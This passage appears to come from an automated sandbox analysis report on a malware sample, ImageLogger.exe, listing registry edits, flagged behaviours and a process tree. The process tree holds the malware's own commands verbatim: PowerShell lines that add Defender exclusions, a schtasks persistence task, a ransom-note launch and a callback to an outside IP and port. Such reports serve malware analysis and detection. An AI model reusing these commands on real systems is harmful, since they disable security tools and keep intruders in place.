| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656} | C:\Windows\explorer.exe | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\497A7447E2AFEB24ABA9F5BC5DC4D53F\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16" | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0" | C:\Windows\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616209" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2080292272-204036150-2159171770-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\explorer.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe | N/A |
| N/A | N/A | C:\Program Files\VideoLAN\VLC\vlc.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Processes
C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe
"C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ImageLogger.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'ImageLogger.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'RuntimeBroker.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "RuntimeBroker" /tr "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5216 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,12493411454449047505,789863895145461872,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Users\Admin\Desktop\How To Decrypt My Files.html
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x40,0x134,0x7ffd096646f8,0x7ffd09664708,0x7ffd09664718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2168 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2392 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,5618581219131323525,8541631778197707328,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1824 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2176 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2952 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2960 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4408 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4588 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5116 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x230,0x260,0x7ff638c5ae48,0x7ff638c5ae58,0x7ff638c5ae68
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4692 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4416 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=3372 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4744 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3512 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5416 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:8
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3cc 0x2ec
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5776 --field-trial-handle=2044,i,6804115783360067307,10971470147706887476,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe
"C:\Users\Admin\AppData\Local\Temp\kjxtjz.exe"
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Local\Temp\wszaxi.exe
"C:\Users\Admin\AppData\Local\Temp\wszaxi.exe"
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Program Files\VideoLAN\VLC\vlc.exe
"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\jlkern.mp3"
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" 193.161.193.99 39917 <123456789> FADB3748ACBB914CAD69
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -c explorer shell:::{3080F90E-D7AD-11D9-BD98-0000947B0257}
C:\Windows\SysWOW64\explorer.exe
"C:\Windows\system32\explorer.exe" shell::: -encodedCommand MwAwADgAMABGADkAMABFAC0ARAA3AEEARAAtADEAMQBEADkALQBCAEQAOQA4AC0AMAAwADAAMAA5ADQANwBCADAAMgA1ADcA -inputFormat xml -outputFormat text
C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --mute-audio --disable-audio --disable-3d-apis --disable-gpu --disable-d3d11 "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd0762ab58,0x7ffd0762ab68,0x7ffd0762ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-d3d11 --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1696 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=1968 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mute-audio --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --mojo-platform-channel-handle=2080 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\Chrome Data" --disable-3d-apis --first-renderer-process --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2972 --field-trial-handle=1832,i,6260847601799412050,692752828819319831,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
